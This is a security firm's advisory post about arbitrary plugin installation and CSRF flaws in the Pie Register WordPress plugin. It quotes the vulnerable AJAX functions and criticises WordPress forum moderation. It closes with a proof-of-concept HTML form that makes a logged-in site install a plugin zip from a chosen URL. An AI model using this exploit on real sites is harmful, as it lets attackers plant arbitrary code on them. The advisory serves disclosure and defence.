WordPress Plugin Targeted by Hacker Contains Authenticated Arbitrary File Upload Vulnerability
The WordPress plugin Pie Register has had many vulnerabilities discovered in over the years, including multiple serious vulnerabilities that you would expect hackers to try to exploit. Despite that, WordPress states it has 5,000 active installs, so continued insecurity doesn’t appear to discourage people from using a plugin (though thankfully, none of the customers of our main service are currently using the plugin).
Over the weekend, we had what look to be a hacker probing for usage of the plugin on this website with a request for the following file:
/wp-content/plugins/pie-register/readme.txt
One disclosed in October of last year through exploit code would allow an attacker to log in to any WordPress account and that could explain a hacker’s interest, but as is our standard practice, we wanted to make sure there wasn’t an obvious unfixed vulnerability that might be being targeted by a hacker in the plugin. What we found in limited checking as part of doing that is that security of the plugin is a mess. Our Plugin Security Checker points toward some of the insecurity, though there is quite a bit more.
An example of that mess leads into a serious vulnerability that hackers would be interested in exploiting.
In the plugin’s main file, /pie-register.php, we found that the plugin contains AJAX accessible functions that allow activating and deactivating arbitrary plugins on the website. Both functions lack a nonce check to prevent cross-site request forgery (CSRF), so an attacker could cause someone with the capability checked for in the functions to take those actions without intending it:
710 711 712 713 714 715 716 717 718 719 720 721 722 723 724 | function pieregister_activate_addon() { // Check for permissions. if ( ! current_user_can( 'activate_plugins' ) ) { wp_send_json_error( esc_html__( 'Plugin activation is disabled for you on this site.', 'pie-register' ) ); } if ( isset( $_POST['plugin'] ) ) { $type = 'addon'; if ( ! empty( $_POST['type'] ) ) { $type = sanitize_key( $_POST['type'] ); } $plugin = sanitize_text_field( wp_unslash( $_POST['plugin'] ) ); $activate = activate_plugins( $plugin ); |
739 740 741 742 743 744 745 746 747 748 749 750 751 752 753 754 | function pieregister_deactivate_addon() { // Check for permissions. if ( ! current_user_can( 'deactivate_plugins' ) ) { wp_send_json_error( esc_html__( 'Plugin deactivation is disabled for you on this site.', 'pie-register' ) ); } $type = 'addon'; if ( ! empty( $_POST['type'] ) ) { $type = sanitize_key( $_POST['type'] ); } if ( isset( $_POST['plugin'] ) ) { $plugin = sanitize_text_field( wp_unslash( $_POST['plugin'] ) ); deactivate_plugins( $plugin ); |
There is another AJAX accessible function that allows installing arbitrary plugins, which lacks even the capabilities check that the two previous functions contain:
767 768 769 770 771 772 773 774 775 776 777 778 779 780 781 782 783 784 785 786 787 788 789 790 791 792 793 794 795 796 797 798 799 800 801 802 803 804 805 806 807 808 809 810 811 812 813 814 815 816 817 818 819 820 821 822 823 824 | function pieregister_install_addon() { $generic_error = esc_html__( 'There was an error while performing your request.', 'pie-register' ); $type = 'addon'; if ( ! empty( $_POST['type'] ) ) { $type = sanitize_key( $_POST['type'] ); } $error = esc_html__( 'Could not install addon. Please download and install manually.', 'pie-register' ); if ( empty( $_POST['plugin'] ) ) { wp_send_json_error( $error ); } // Set the current screen to avoid undefined notices. set_current_screen( 'pie-register_page_pie-about-us' ); // Prepare variables. $url = esc_url_raw( add_query_arg( array( 'page' => 'pie-about-us', ), admin_url( 'admin.php' ) ) ); $creds = request_filesystem_credentials( $url, '', false, false, null ); // Check for file system permissions. if ( false === $creds ) { wp_send_json_error( $error ); } if ( ! WP_Filesystem( $creds ) ) { wp_send_json_error( $error ); } /* * We do not need any extra credentials if we have gotten this far, so let's install the plugin. */ require_once(plugin_dir_path( __FILE__ ) . 'classes/admin/pie-class-install-skin.php'); require_once(plugin_dir_path( __FILE__ ) . 'classes/admin/PieRegPluginSilentUpgrader.php'); // Do not allow WordPress to search/download translations, as this will break JS output. remove_action( 'upgrader_process_complete', array( 'Language_Pack_Upgrader', 'async_upgrade' ), 20 ); // Create the plugin upgrader with our custom skin. $installer = new PieRegPluginSilentUpgrader( new PieReg_Install_Skin() ); // Error check. if ( ! method_exists( $installer, 'install' ) || empty( $_POST['plugin'] ) ) { wp_send_json_error( $error ); } $installer->install( $_POST['plugin'] ); // phpcs:ignore |
The plugin doesn’t have to come from WordPress’ plugin directory, so arbitrary files can be uploaded through this. That could also be exploited through CSRF.
The last line shown from that function has a comment, “phpcs:ignore”. That would indicate that the plugin has been checked with the PHP_Codesniffer software, presumably using the WordPress Coding Standards for PHP_CodeSniffer. From what we have seen, that software is often seen as being a good way to check over the security of a plugin, which isn’t the case.
WordPress Causes Full Disclosure
As a protest of the moderators of the WordPress Support Forum’s continued inappropriate behavior we changed from reasonably disclosing to full disclosing vulnerabilities for plugins in the WordPress Plugin Directory in protest, until WordPress gets that situation cleaned up, so we are releasing this post and then leaving a message about that for the developer through the WordPress Support Forum. (For plugins that are also in the ClassicPress Plugin Directory, we will follow our reasonable disclosure policy.)
You can notify the developer of this issue on the forum as well.
Hopefully, the moderators will finally see the light and clean up their act soon, so these full disclosures will no longer be needed (we hope they end soon). You would think they would have already done that, but considering that they believe that having plugins, which have millions installs, remain in the Plugin Directory despite them knowing they are vulnerable is “appropriate action”, something is very amiss with them (which is even more reason the moderation needs to be cleaned up).
If the moderation is cleaned up, it would also allow the possibility of being able to use the forum to start discussing fixing the problems caused by the very problematic handling of security by the team running the Plugin Directory, discussions which they have for years shut down through their control of the Support Forum.
Update: To clear up the confusion where developers claim we hadn’t tried to notify them through the Support Forum (while at the same time moderators are complaining about us doing just that), here is the message we left for this vulnerability:
Is It Fixed?
If you are reading this post down the road the best way to find out if this vulnerability or other WordPress plugin vulnerabilities in plugins you use have been fixed is to sign up for our service, since what we uniquely do when it comes to that type of data is to test to see if vulnerabilities have really been fixed. Relying on the developer’s information can lead you astray, as we often find that they believe they have fixed vulnerabilities, but have failed to do that.
Proof of Concept
The following proof of concept will upload the specified plugin, when logged in to WordPress.
Replace “[path to WordPress]” with the location of WordPress and “[plugin URL]” with the URL of the .zip file for the plugin to install.
<html> <body> <form action="http://[path to WordPress]/wp-admin/admin-ajax.php?action=pieregister_install_addon" method="POST"> <input type="hidden" name="plugin" value="[plugin URL]" /> <input type="submit" value="Submit" /> </form> </body> </html>